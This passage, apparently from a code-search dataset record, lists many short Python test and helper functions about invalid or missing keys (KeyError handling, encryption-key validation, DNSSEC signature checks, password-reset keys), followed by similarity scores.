'Wrong string'", "def test_handle_key_error():\n\n @handle_key_error\n def get_item(key):\n data = {\"A\": 1, \"B\": 2}\n return data[key]\n\n value = get_item(\"A\")\n assert value == 1\n\n with pytest.raises(InvalidParameter) as exc:\n get_item(\"C\")\n\n assert \"C\" in str(exc.value)", "def test_empty_key_string(self):\n def x():\n y = pyamf.MixedArray()\n y.update({'': 1, 0: 1})\n self.encode(y)\n\n self.assertRaises(pyamf.EncodeError, x)", "def test_map_missing_key_encountered():\n with pytest.raises(KeyError):\n Map().read_key(10, b\"\")", "def _transport_key_not_found():\n pecan.abort(404, u._('Not Found. 
Transport Key not found.'))", "def test_get_read_fail(self):\n file_handler = open(self.test_key_filename, 'w')\n file_handler.write('Mock corrupt data')\n file_handler.close()\n os.chmod(self.test_key_filename, 000)\n\n self.assertRaises(IOError, self.key_gen.get)", "def test_invalid_signature(self):\n bundle = self._load_bundle_from_file(\n \"ksr-root-2016-q3-0.xml\", \"a6b6162e-b299-427e-b11b-1a8c54a08910\"\n )\n # validate signature is OK with the original key\n self.assertTrue(validate_signatures(bundle))\n key = bundle.keys.pop()\n _pk = base64.b64decode(key.public_key)\n # change the last byte of the public key\n _pk = _pk[:-1] + bytes([_pk[-1] + 1])\n new_key = Key(\n algorithm=key.algorithm,\n flags=key.flags,\n key_identifier=key.key_identifier,\n key_tag=key.key_tag,\n protocol=key.protocol,\n public_key=base64.b64encode(_pk),\n ttl=key.ttl,\n )\n bundle.keys.add(new_key)\n # test that the signature no longer validates\n with self.assertRaises(InvalidSignature):\n validate_signatures(bundle)", "def existing_key_fail(self, data, new_data):\n message = 'exists'\n rv = self.add_success(data)\n assert not in_response(rv, message)\n self.add_fail(data, message)\n rv = self.add_success(new_data)\n assert not in_response(rv, message)\n self.update_fail(data, message)\n assert self.verify_object(new_data)", "def raiseNonRecoverableError(msg):\n error(msg)\n raise NonRecoverableError(msg)", "def test_invalid_chars_ssck(self):\r\n valid_base = SlashSeparatedCourseKey(u'org.dept-1%2', u'course.sub-2%3', u'run.faster-4%5')\r\n for key in SlashSeparatedCourseKey.KEY_FIELDS:\r\n with self.assertRaises(InvalidKeyError):\r\n # this ends up calling the constructor where the legality check should occur\r\n valid_base.replace(**{key: u'funny thing'})", "def test_kms_encrypt_fails_client_error(self):\n self.mock_kms.encrypt.side_effect = self.client_error\n with self.assertRaises(SystemExit):\n ef_utils.kms_encrypt(self.mock_kms, self.service, self.env, self.secret)", "def test_44_password_reset_key_errors(self, Mock):\r\n self.register()\r\n user = User.query.get(1)\r\n userdict = {'user': user.name, 'password': user.passwd_hash}\r\n fakeuserdict = {'user': user.name, 'password': 'wronghash'}\r\n fakeuserdict_err = {'user': user.name, 'passwd': 'some'}\r\n fakeuserdict_form = {'user': user.name, 'passwd': 'p4ssw0rD'}\r\n key = signer.signer.dumps(userdict, salt='password-reset')\r\n returns = [BadSignature('Fake Error'), BadSignature('Fake Error'), userdict,\r\n fakeuserdict, userdict, userdict, fakeuserdict_err]\r\n\r\n def side_effects(*args, **kwargs):\r\n result = returns.pop(0)\r\n if isinstance(result, BadSignature):\r\n raise result\r\n return result\r\n Mock.side_effect = side_effects\r\n # Request with no key\r\n res = self.app.get('/account/reset-password', follow_redirects=True)\r\n assert 403 == res.status_code\r\n # Request with invalid key\r\n res = self.app.get('/account/reset-password?key=foo', follow_redirects=True)\r\n assert 403 == res.status_code\r\n # Request with key exception\r\n res = self.app.get('/account/reset-password?key=%s' % (key), follow_redirects=True)\r\n assert 403 == res.status_code\r\n res = self.app.get('/account/reset-password?key=%s' % (key), follow_redirects=True)\r\n assert 200 == res.status_code\r\n res = self.app.get('/account/reset-password?key=%s' % (key), follow_redirects=True)\r\n assert 403 == res.status_code\r\n\r\n # Check validation\r\n res = self.app.post('/account/reset-password?key=%s' % (key),\r\n data={'new_password': '',\r\n 'confirm': 
'#4a4'},\r\n follow_redirects=True)\r\n\r\n assert \"Please correct the errors\" in res.data, res.data\r\n\r\n res = self.app.post('/account/reset-password?key=%s' % (key),\r\n data={'new_password': 'p4ssw0rD',\r\n 'confirm': 'p4ssw0rD'},\r\n follow_redirects=True)\r\n\r\n assert \"You reset your password successfully!\" in res.data\r\n\r\n # Request without password\r\n res = self.app.get('/account/reset-password?key=%s' % (key), follow_redirects=True)\r\n assert 403 == res.status_code", "def testBadKeys(self):\n # Ignore access to protected members\n # pylint: disable=W0212\n self.assertRaises(DOLAPI._DOLAPIError,\n self.badauth.table,\n self.dataset,\n self.table)", "def _check_transform_key(key: Hashable) -> None:\n _test_hashable = hash(key) # The only 'real' way to make sure is hashable\n # if not isinstance(key, Hashable):\n # raise TypeError((type(key), \"transformation lookup key is not hashable\"))", "def test_invalid_key(self):\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('221b=\"starts with number\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('_=\"not assignable\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('o-o=\"invalid character\"')\n assert 'Invalid key' in str(err.value)", "def test_blob_key_stored():\n\tbackup_and_restore(\n\t\tlambda context: put_keys(lib.SET, BLOB_KEYS, \"foobar\", True),\n\t\tNone,\n\t\tlambda context: check_keys(lib.SET, BLOB_KEYS, \"foobar\", True)\n\t)", "def test_get_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"]", "def validate_key(key):\r\n try:\r\n secret.Secret(key)\r\n except secret.Secret.InvalidSecret as e:\r\n raise KeyIsInvalid(e.message)", "def setup_key_encrypt(self):\r\n\t\tself.max_key = math.floor(len(self.message) / 2)\r\n\t\twhile True:\r\n\t\t\tkey = input(f\"Please enter a key value less than or equal to {self.max_key}. --> \")\r\n\t\t\ttry:\r\n\t\t\t\tself.key = int(key)\r\n\t\t\texcept ValueError:\r\n\t\t\t\tprint(\"Key needs to be a number.\")\r\n\t\t\t\tcontinue\r\n\t\t\tif self.key > self.max_key: \t\t\t\r\n\t\t\t\tprint(f\"{key} is too big of a number.\")\t\r\n\t\t\telif self.key == 0:\r\n\t\t\t\tprint(\"0 cannot be a key\")\t\t\t\r\n\t\t\telse:\t\t\t\r\n\t\t\t\tbreak", "def test_string_key_stored():\n\tbackup_and_restore(\n\t\tlambda context: put_keys(lib.SET, STRING_KEYS, \"foobar\", True),\n\t\tNone,\n\t\tlambda context: check_keys(lib.SET, STRING_KEYS, \"foobar\", True)\n\t)", "def test_incorrect_prediction_key(self):\n self._config['Prediction key'] = 'wrong_key'\n with self.assertRaisesRegex(ValueError, 'Invalid prediction key'):\n self._gen.generate(\n example=self._example,\n model=self._model,\n dataset=self._dataset,\n config=self._config)", "def encrypt():\n\tnull = 0", "def test_getKey_keyexists(self):\n filename = self.mktemp()\n with open(filename, 'wb') as fh:\n fh.write(SEKRIT_KEY)\n fh.flush()\n\n key = crypto.getKey(filename)\n self.failUnlessIsInstance(key, basestring,\n \"key isn't a string! 
type=%r\" % type(key))\n self.assertEqual(SEKRIT_KEY, key,\n \"\"\"The example key and the one read from file differ!\n key (in hex): %s\n SEKRIT_KEY (in hex): %s\"\"\"\n % (key.encode('hex'), SEKRIT_KEY.encode('hex')))", "def test_attempt_to_add_uid_key_causes_error():\n starting_db = create_db(STARTING_DB_INPUT)\n starting_db.put_item(\n Item={\n \"uid\": \"I can TOTALLY update someone else's object\"\n }\n )\n with pytest.raises(ValueError):\n o_obj.update_object_in_db(\n starting_db,\n \"some_uid\",\n json.dumps({\n \"uid\": \"I can TOTALLY update someone else's object\"\n })\n )", "def test_getitem_cleared_key(testchannel):\n key = testchannel.add(list)\n testchannel.remove(key)\n\n with pytest.raises(KeyError) as err:\n testchannel.__getitem__(key)\n\n assert err.value.args == (key, )", "def _reraise(*args, **keys):\n return True", "def fail(self, key: str, **kwargs):\n warnings.warn(\n '`Field.fail` is deprecated. Use `raise self.make_error(\"{}\", ...)` instead.'.format(\n key\n ),\n RemovedInMarshmallow4Warning,\n stacklevel=2,\n )\n raise self.make_error(key=key, **kwargs)", "def gpg_error(exception, message):\n LOGGER.debug(\"GPG Command %s\", ' '.join([str(x) for x in exception.cmd]))\n LOGGER.debug(\"GPG Output %s\", exception.output)\n raise CryptoritoError(message)", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def handle_key(self, k):\n\t\treturn False", "def test_real_world_malware(self):\n key = bytes.fromhex('0394d550fb286dda')\n data = bytes.fromhex('6bdb2c294e7e031c38e4adecaa8dc755')\n unit = self.load(key, raw=True)\n self.assertEqual(unit.decrypt(data).hex(), '4c5a495001b30026968e700017f7ec05')", "def Revert():\n raise Exception(0xF1F1F2F2F3F3F4F4)", "def test_get_key_digest_with_no_parameter(self):\n with pytest.raises(TypeError) as typeError:\n self.as_connection.get_key_digest()\n\n assert \"argument 'ns' (pos 1)\" in str(\n typeError.value)", "def test_key_without_signature(self):\n bundle = self._load_bundle_from_file(\n \"ksr-root-2016-q3-0.xml\", \"a6b6162e-b299-427e-b11b-1a8c54a08910\"\n )\n new_key = Key(\n key_identifier=\"ZSK-24315\",\n key_tag=24315,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n public_key=base64.b64encode(b\"test key\"),\n )\n bundle.keys.add(new_key)\n # test that the signature no longer validates\n with self.assertRaises(InvalidSignature):\n validate_signatures(bundle)" ]
[ "0.7787494", "0.7165129", "0.7140279", "0.71330994", "0.69257516", "0.6686824", "0.6646899", "0.6348278", "0.6192973", "0.6057841", "0.60305434", "0.6001477", "0.5970502", "0.58401686", "0.5836722", "0.5806258", "0.5804228", "0.57949257", "0.57405263", "0.57361877", "0.5714895", "0.5691836", "0.5686841", "0.56837195", "0.5633617", "0.5630989", "0.5623438", "0.560158", "0.5600826", "0.5600826", "0.5571059", "0.55423266", "0.55292255", "0.5520465", "0.55142146", "0.5512181", "0.55018103", "0.54905087", "0.548471", "0.5466198", "0.54398763", "0.54397094", "0.5438906", "0.542902", "0.54280216", "0.5418787", "0.54184216", "0.5414903", "0.54133576", "0.5404434", "0.5381153", "0.53770536", "0.53694403", "0.5367749", "0.53648907", "0.5357562", "0.5355447", "0.5355117", "0.5355049", "0.535161", "0.53372896", "0.5331178", "0.5328484", "0.5327844", "0.53264123", "0.5313775", "0.5308364", "0.53025776", "0.5300799", "0.52870506", "0.52821803", "0.5280002", "0.5274749", "0.52673", "0.52672505", "0.5262957", "0.5250962", "0.52492076", "0.5246664", "0.5239189", "0.5238688", "0.523373", "0.5233719", "0.5226667", "0.52177286", "0.5213184", "0.5209179", "0.52002597", "0.5194084", "0.5190158", "0.5188901", "0.5182567", "0.5179232", "0.5178732", "0.51636124", "0.5159863", "0.5152981", "0.51511705", "0.51357424", "0.5130093" ]
0.82164097
0
It raises an error when given an invalid new key.
def test_rekey_key_format(self):
    old_key = b'0' * 32
    encrypted = encrypt('message', key=old_key)

    with pytest.raises(EncryptionError):
        rekey(encrypted, old_key=old_key, new_key=b'1' * 31)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _newKey(self, key):\n pass", "def _check_key(self, key):\n raise NotImplementedError", "def test_rekey_non_encrypted(self):\n with pytest.raises(EncryptionError):\n rekey('message', old_key=b'0' * 32, new_key=b'1' * 32)", "def test_set_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"] = \"value\"", "def validate_key_throw(*args):\n validation_result = validate_key(*args)\n if not validation_result:\n raise ValueError(str(validation_result))\n return validation_result", "def test_invalid_keys(self):\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"this has spaces\", 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"key with spaces did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"\\x10control\\x02characters\\x11\", 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"key with control characters did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(\"a\" * (SERVER_MAX_KEY_LENGTH + 1), 1)\n\t\texcept ValueError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"long key did not raise ValueError\")\n\n\t\ttry:\n\t\t\tyield self.conn.set(u\"unicode\\u4f1a\", 1)\n\t\texcept TypeError:\n\t\t\tpass\n\t\telse:\n\t\t\tself.fail(\"unicode key did not raise ValueError\")", "def existing_key_fail(self, data, new_data):\n message = 'exists'\n rv = self.add_success(data)\n assert not in_response(rv, message)\n self.add_fail(data, message)\n rv = self.add_success(new_data)\n assert not in_response(rv, message)\n self.update_fail(data, message)\n assert self.verify_object(new_data)", "def __missing__(self, key):\n global MISSING\n MISSING = key # For debugging - save name of missing key\n return INVALID", "def test_encrypt_key_invalid(self):\n with pytest.raises(EncryptionError):\n encrypt('message', key=b'0' * 31)", "def test_handle_key_error():\n\n @handle_key_error\n def get_item(key):\n data = {\"A\": 1, \"B\": 2}\n return data[key]\n\n value = get_item(\"A\")\n assert value == 1\n\n with pytest.raises(InvalidParameter) as exc:\n get_item(\"C\")\n\n assert \"C\" in str(exc.value)", "def isValidKey(key):\n return True", "def test_getObjectByKey_raises_KeyError(self):\n try:\n self.tile_bucket.getObjectByKey('foo_key')\n except KeyError:\n return\n assert(False)", "def test_keyerror(self):\n try:\n self.db['foo']\n except KeyError, e:\n assert \"no key 'foo' in database <SequenceFileDB\" in str(e), str(e)", "def test_duplicate_key_identifier(self):\n bundle = self._load_bundle_from_file(\n \"ksr-root-2016-q3-0.xml\", \"a6b6162e-b299-427e-b11b-1a8c54a08910\"\n )\n new_key = Key(\n key_identifier=list(bundle.keys)[0].key_identifier,\n key_tag=4711,\n ttl=1978,\n flags=256,\n protocol=3,\n algorithm=AlgorithmDNSSEC.RSASHA1,\n public_key=base64.b64encode(b\"test key\"),\n )\n bundle.keys.add(new_key)\n # test that the signature no longer validates\n with self.assertRaises(ValueError):\n validate_signatures(bundle)", "def testKeyInfoTooShort(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='x', keyInfo='xx')", "def test_get_invalid_key(test_file):\n md = OSXMetaData(test_file.name)\n with pytest.raises(KeyError):\n md[\"invalid_key\"]", "def test_keys_failure(self):\n storage = Storage()\n storage._keys_dict = {'1': 'one',\n 'abc': '1'}\n self.assertRaises(StoragePatternError, storage.keys, 'ab[cd')", "def keyError():\n d = {}\n d['cat']", "def testBadKeyToToken(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey')", "def 
validate_key(key):\r\n try:\r\n secret.Secret(key)\r\n except secret.Secret.InvalidSecret as e:\r\n raise KeyIsInvalid(e.message)", "def test_map_missing_key_encountered():\n with pytest.raises(KeyError):\n Map().read_key(10, b\"\")", "def test_neg_exists_key_invalid_data(self, key, ex_code, ex_msg):\n with pytest.raises(e.ParamError):\n key, _ = self.as_connection.exists(key)", "def test_setter_invalid_key(self):\n root = netapp_api.NaElement('root')\n try:\n root[None] = 'value'\n except Exception as e:\n if not isinstance(e, KeyError):\n self.fail(_('Error not a KeyError.'))", "def test_setter_invalid_key(self):\n root = netapp_api.NaElement('root')\n try:\n root[None] = 'value'\n except Exception as e:\n if not isinstance(e, KeyError):\n self.fail(_('Error not a KeyError.'))", "def _add_error(self, key, message):\n if key not in self._error_key_list:\n self._error_key_list.append(key)\n self.add_error(key, str(message))", "def corrupt(self, key):\n rand_bytes = random.getrandbits(8)\n byte_str = bytes([rand_bytes])\n self.client[key] = byte_str\n print('Corrupted %s in redis' % key)", "def test_wrong_key(self):\n with pytest.raises(FinderInsideProException) as ex:\n FinderInsidePro(\"\")\n assert FinderInsideProException.EXCEPTION_TEXT_KEY_NOT_SET in str(ex)\n assert ex.value.extype == FinderInsideProException.TYPE_KEY_IS_WRONG\n\n with pytest.raises(FinderInsideProException) as ex:\n FinderInsidePro('aaa')\n assert FinderInsideProException.EXCEPTION_TEXT_WRONG_KEY in str(ex)\n assert ex.value.extype == FinderInsideProException.TYPE_KEY_IS_WRONG", "def add_existing_key_fail(self, data):\n message = 'exists'\n rv = self.add_success(data)\n assert not in_response(rv, message)\n return self.add_fail(data, message)", "def testKeyInfoTooLong(self):\n key = 5\n self.assertRaises(ValueError, dataToToken, key, data='hey',\n keyInfo='xxxxx')", "def test_missing_entry_raises_KeyError(self):\n with self.assertRaises(KeyError):\n self.phonebook.lookup(\"missing\")", "def test_attempt_to_add_uid_key_causes_error():\n starting_db = create_db(STARTING_DB_INPUT)\n starting_db.put_item(\n Item={\n \"uid\": \"I can TOTALLY update someone else's object\"\n }\n )\n with pytest.raises(ValueError):\n o_obj.update_object_in_db(\n starting_db,\n \"some_uid\",\n json.dumps({\n \"uid\": \"I can TOTALLY update someone else's object\"\n })\n )", "def test_invalid_key(self):\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('221b=\"starts with number\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('_=\"not assignable\"')\n assert 'Invalid key' in str(err.value)\n with pytest.raises(yaenv.EnvError) as err:\n _ = yaenv.core.EnvVar('o-o=\"invalid character\"')\n assert 'Invalid key' in str(err.value)", "def make_error(self, key: str, **kwargs) -> ValidationError:\n try:\n msg = self.error_messages[key]\n except KeyError as error:\n class_name = self.__class__.__name__\n message = (\n \"ValidationError raised by `{class_name}`, but error key `{key}` does \"\n \"not exist in the `error_messages` dictionary.\"\n ).format(class_name=class_name, key=key)\n raise AssertionError(message) from error\n if isinstance(msg, (str, bytes)):\n msg = msg.format(**kwargs)\n return ValidationError(msg)", "def __check_key_validity(self, key):\n if not isinstance(key, tuple):\n raise TypeError(\"key must be a tuple\")\n if len(key) != 2:\n raise ValueError(\"key must be of length two\")\n if not (isinstance(key[0], int) and isinstance(key[1], int)):\n 
raise TypeError(\"elements of key must be integers\")\n if not ((0 <= key[0] < self.m) and (0 <= key[1] < self.n)):\n raise exc.OutOfBoundsError(\"key is out of bounds\")", "def test_throws_item_missing_key(self):\n with pytest.raises(marshmallow.ValidationError):\n Item.Schema().loads(json.dumps(item_missing_key))", "def test_incorrect_prediction_key(self):\n self._config['Prediction key'] = 'wrong_key'\n with self.assertRaisesRegex(ValueError, 'Invalid prediction key'):\n self._gen.generate(\n example=self._example,\n model=self._model,\n dataset=self._dataset,\n config=self._config)", "def test_invalid_chars_location(self):\r\n course_key = SlashSeparatedCourseKey(u'org.dept-1%2', u'course.sub-2%3', u'run.faster-4%5')\r\n valid_base = course_key.make_usage_key('tomato-again%9', 'block-head:sub-4%9')\r\n for key in SlashSeparatedCourseKey.KEY_FIELDS:\r\n with self.assertRaises(InvalidKeyError):\r\n # this ends up calling the constructor where the legality check should occur\r\n valid_base.replace(**{key: u'funny thing'})", "def test_invalid(self):\n created = datetime.datetime(2019, 1, 1, tzinfo=datetime.timezone.utc)\n last_used = datetime.datetime(2019, 1, 2, tzinfo=datetime.timezone.utc)\n key = Key('user2', 'ldasfkk', 'Inactive', created, last_used)\n with pytest.raises(AssertionError):\n key.audit(5, 1, 1, 1)", "def _newKey(self, key):\n self._testKeySubNsAdd()\n self._getKeyList().append(key)", "def test_decrypt_key_invalid(self):\n encrypted = encrypt('message', key=b'0' * 32)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=b'0' * 31)", "def update_existing_key_fail(self, data, new_data):\n message = 'exists'\n rv = self.add_success(data)\n assert not in_response(rv, message)\n rv = self.add_success(new_data)\n assert not in_response(rv, message)\n rv = self.update_fail(data, message)\n assert self.verify_object(new_data)\n return rv", "def testTokenToDataWithBadKey(self):\n key = createKey()\n data = {u'user': u'aliafshar'}\n token = dataToToken(key, data)\n self.assertRaises(ValueError, tokenToData, createKey(), token=token)", "def test_decrypt_key_incorrect(self):\n right_key = b'0' * 32\n wrong_key = b'1' * 32\n\n encrypted = encrypt('message', key=right_key)\n\n with pytest.raises(EncryptionError):\n decrypt(encrypted, key=wrong_key)", "def __missing__(self, key):\n return key", "def _KeyMissing(side):\n return 'Key missing from %s' % side", "def fail(self, key, **kwargs):\n return fail(self, key, **kwargs)", "def test_dweet_for_with_an_invalid_key(self):\n try:\n dweepy.dweet_for(self.my_thing_id, test_data, key='badkey')\n except dweepy.DweepyError as e:\n self.assertEqual(e.args[0], 'the key you provided doesn\\'t work with this thing')\n else:\n self.fail(\"shouldn't ever get called\")", "def _check_key(key): # type: (str) -> None\n if not key:\n raise ValueError('Key must not be empty.')\n if '.' in key:\n raise ValueError('Key must not contain dots.')", "def keychange(self):\n # if response.json()['error']['errors'][0]['reason']=='quotaExceeded':\n self.keyindex += 1\n if self.keyindex == len(self.keylist):\n self.keyindex = 0\n print('Keylist length reached')\n print('Changinf Key..')\n key = self.keylist[self.keyindex]\n print(\"Quota Exceeded\", self.keyindex)\n return key", "def test_get_single_different(single_bucket): # pylint: disable=redefined-outer-name\n with pytest.raises(KeyError):\n single_bucket.get(\"key 2\")", "def fail(self, key: str, **kwargs):\n warnings.warn(\n '`Field.fail` is deprecated. 
Use `raise self.make_error(\"{}\", ...)` instead.'.format(\n key\n ),\n RemovedInMarshmallow4Warning,\n stacklevel=2,\n )\n raise self.make_error(key=key, **kwargs)", "def test_invalid_signature(self):\n bundle = self._load_bundle_from_file(\n \"ksr-root-2016-q3-0.xml\", \"a6b6162e-b299-427e-b11b-1a8c54a08910\"\n )\n # validate signature is OK with the original key\n self.assertTrue(validate_signatures(bundle))\n key = bundle.keys.pop()\n _pk = base64.b64decode(key.public_key)\n # change the last byte of the public key\n _pk = _pk[:-1] + bytes([_pk[-1] + 1])\n new_key = Key(\n algorithm=key.algorithm,\n flags=key.flags,\n key_identifier=key.key_identifier,\n key_tag=key.key_tag,\n protocol=key.protocol,\n public_key=base64.b64encode(_pk),\n ttl=key.ttl,\n )\n bundle.keys.add(new_key)\n # test that the signature no longer validates\n with self.assertRaises(InvalidSignature):\n validate_signatures(bundle)", "def avoid_keyerror(dictionary, key):\n\t\"*** YOUR CODE HERE ***\"\n\ttry:\n\t\tvalue = dictionary[key]\n\texcept KeyError:\n\t\tprint('Avoid Exception')\n\t\tdictionary[key] = value = 'no value'\n\tfinally:\n\t\treturn value", "def __missing__(self, key):\n raise KeyNotInContextError(f\"{key} not found in the pypyr context.\")", "def test03Expire(self):\n s = utils.FastStore(max_size=100)\n key = \"test1\"\n s.Put(key, 1)\n\n # This should not raise\n self.assertEqual(s.Get(key), 1)\n s.ExpireObject(key)\n\n self.assertRaises(KeyError, s.Get, key)", "def error(self, key, value, context, errorclass=InvalidDataError, **values):\n msg_template = self.message_for_key(key, context)\n raise errorclass(msg_template % values, value, key=key, context=context)", "def touchKBucket(self, key):", "def test01StoreExpiration(self):\n s = utils.FastStore(max_size=5)\n keys = []\n for i in range(0, 100):\n keys.append(s.Put(i, i))\n\n # This should not raise\n s.Get(keys[-1])\n\n # This should raise though\n self.assertRaises(KeyError, s.Get, keys[0])", "def test_get_latest_dweet_for_with_an_invalid_key(self):\n try:\n dweepy.get_latest_dweet_for(self.my_thing_id, key='badkey')\n except dweepy.DweepyError as e:\n self.assertEqual(e.args[0], 'the key you provided doesn\\'t work with this thing')\n else:\n self.fail(\"shouldn't ever get called\")", "def validate_instruction_keys(instruction: TransactionInstruction, expected: int) -> None:\n if len(instruction.keys) < expected:\n raise ValueError(f\"invalid instruction: found {len(instruction.keys)} keys, expected at least {expected}\")", "def test_other_user_kvs_set_failure(self):\r\n with self.assertRaises(AssertionError):\r\n self.kvs.set(self.other_key_factory(self.existing_field_name), \"new_value\")", "def test_toofewkeys(self):\n self.assertRaises(recordparser.KeyListMismatchError,\n recordparser.getfields, \"1234567890\", \"10s\", ())", "def test_config_key_error():\n c = core.Config()\n\n with pytest.raises(KeyError):\n c['doesNotExist']", "def test_invalid_chars_ssck(self):\r\n valid_base = SlashSeparatedCourseKey(u'org.dept-1%2', u'course.sub-2%3', u'run.faster-4%5')\r\n for key in SlashSeparatedCourseKey.KEY_FIELDS:\r\n with self.assertRaises(InvalidKeyError):\r\n # this ends up calling the constructor where the legality check should occur\r\n valid_base.replace(**{key: u'funny thing'})", "def test_throws_base_price_missing_key(self):\n with pytest.raises(marshmallow.ValidationError):\n BasePrice.Schema().loads(json.dumps(base_price_missing_key))", "def Add(self, key, *args):\n temp_error = Errors()\n if ErrMsg.isValidKey(key, 
ErrMsg._MsgKey__class, temp_error):\n if key.argcount != len(args):\n if not self._keychainExists(key):\n self._keychainExists(key, True)\n exception = self._validateException(key.exception)\n if exception:\n self.Raise(exception, key, args)\n else:\n self._add(key, args)\n else:\n self.Add(ErrMsg.Error.Add.Invalid_Msgformat, key.message, args)\n\n elif ErrMsg.isValidKey(key, None, temp_error):\n # Assume GENERIC status\n\n key = ErrMsg._defaultKeyChain(key, temp_error)\n if temp_error:\n pass\n else:\n self.Add(key, args)\n else:\n self.Add(ErrMsg.Error.Add.Invalid_Errorkey, key.message, args)", "def test_getitem_nokey(testchannel):\n key = testchannel.add(list)\n for i in range(5):\n testchannel.add(list)\n testchannel.remove(key)\n\n with pytest.raises(KeyError) as err:\n testchannel.__getitem__(key)\n\n assert err.value.args == (key, )", "def _invalid_transport_key_id():\n pecan.abort(404, u._('Not Found. Provided transport key id is invalid.'))", "def test_is_valid_label_key_invalid_input():\n # test length violations\n assert not is_valid_label_key(key=None) # Too short\n assert not is_valid_label_key(key=\"\") # Too short\n assert not is_valid_label_key(key=f\"{'p' * 254}/n\") # prefix too long\n assert not is_valid_label_key(key=\"/n\") # prefix too short\n assert not is_valid_label_key(key=\"p/\") # name too short\n assert not is_valid_label_key(key=\"a\" * 254) # name too long\n assert not is_valid_label_key(key=f\"d/{'b'*64}\") # name too long\n # test first character violations (not alphanum)\n assert not is_valid_label_key(key=\"-a\")\n assert not is_valid_label_key(key=\".b\")\n assert not is_valid_label_key(key=\" c\")\n # test last character violations (not alphanum)\n assert not is_valid_label_key(key=\"a-\")\n assert not is_valid_label_key(key=\"b.\")\n assert not is_valid_label_key(key=\"c \")\n assert not is_valid_label_key(key=\"sw33T#\")\n # test middle characters violations\n assert not is_valid_label_key(key=\"a$$a\")\n assert not is_valid_label_key(key=\"b b\")", "def test_get_write_fail(self):\n os.chmod(self.test_key_filename, 0400)\n\n self.assertRaises(IOError, self.key_gen.get)", "def test_get_invalid_key(self):\n pairs = {'library': '~/home/documents/dms',\n 'key': 'value',\n }\n exceptionKeys = ['Hello', 'spam']\n try:\n tempconfig = tempfile.NamedTemporaryFile(\n suffix=\".yaml\", delete=False)\n tempconfig.write('ham: eggs'.encode('UTF-8'))\n tempconfig.close()\n config = easydms.config.Config(tempconfig.name)\n\n for key, value in pairs.items():\n self.assertEqual(config.getKey(key, value), value)\n\n for key in exceptionKeys:\n with self.assertRaises(easydms.config.ErrorConfigKeyNotFound):\n config.getRequiredKey(key)\n finally:\n os.remove(tempconfig.name)", "def test_empty_key_raises_error(empty_viewset):\n viewset = empty_viewset\n system1 = viewset.model.add_software_system(name=\"sys1\")\n\n with pytest.raises(ValueError, match=\"A key must be specified\"):\n viewset.create_container_view(\n key=\"\", description=\"container\", software_system=system1\n )", "def error(self, key, **kwargs):\n try:\n msg = self.error_messages[key]\n except KeyError:\n class_name = self.__class__.__name__\n raise AssertionError('Error with key={} is not found for class={}'.format(key, class_name))\n message_string = msg.format(**kwargs)\n raise ValidationError(message_string, code=key)", "def test_basic_singleton_key_error(self):\n\n schema = {\n ('root', str): {\n ('sample node', str, 'sample'): ('node', str, r'[a-z]*')\n }\n }\n data = {'root': {'not sample': 
'node'}}\n\n ERRORS = lws.return_errors()\n expected_schema = {\n ('root', 'root'): [('sample node', ERRORS['key'])]\n }\n expected_data = {\n ('root', 'root'): [('not sample', ERRORS['key'])]\n }\n\n assert dict(lws.validate_schema(schema, data)) == expected_schema\n assert dict(lws.validate_data(schema, data)) == expected_data", "def testBadDataToToken(self):\n key = createKey()\n self.assertRaises(ValueError, dataToToken, key, data=self)", "def test_non_hashable1(self):\n xpb = XPathBuilder()\n xp = xpb.foo.bar\n d = {}\n self.assertRaises(TypeError, hash, xp)\n self.assertRaises(TypeError, d.setdefault, xp, 'key')", "def gpgkey_error(self, repo_id, error):\n self.send(repo_id, 'gpgkey_error', error)", "def test_addProcessDuplicateKeyError(self):\r\n self.pm.addProcess(\"foo\", [\"arg1\", \"arg2\"],\r\n uid=1, gid=2, env={})\r\n self.assertRaises(KeyError, self.pm.addProcess,\r\n \"foo\", [\"arg1\", \"arg2\"], uid=1, gid=2, env={})", "def _raiseIfWebsafeKeyNotValid(websafeKey, kind):\n # Check that websafeKey is not None\n if not websafeKey:\n raise endpoints.BadRequestException(\n \"Websafe key not provided for '%s'\" % kind)\n # Try to decode the websafe key into a real key\n try:\n key = ndb.Key(urlsafe=websafeKey)\n except:\n raise endpoints.BadRequestException(\n \"Websafe key provided for '%s' could not be decoded: %s\" %\n (kind, websafeKey))\n # Ensure that the key is of the desired kind\n if key.kind() != kind:\n raise endpoints.BadRequestException(\n \"Websafe key is not of the '%s' kind: %s\" % (kind, websafeKey))\n # If all is well, return the key\n return key", "def test_toomanykeys(self):\n self.assertRaises(recordparser.KeyListMismatchError,\n recordparser.getfields, \"1234567890\", \"10s\", (\"key1\", \"key2\"))", "def test_newkey(self):\n d = {\n \"action\": \"set\",\n \"node\": {\n \"expiration\": \"2013-09-14T00:56:59.316195568+02:00\",\n \"modifiedIndex\": 183,\n \"key\": u(\"/testkey\"),\n \"ttl\": 19,\n \"value\": \"test0\",\n },\n }\n\n res = 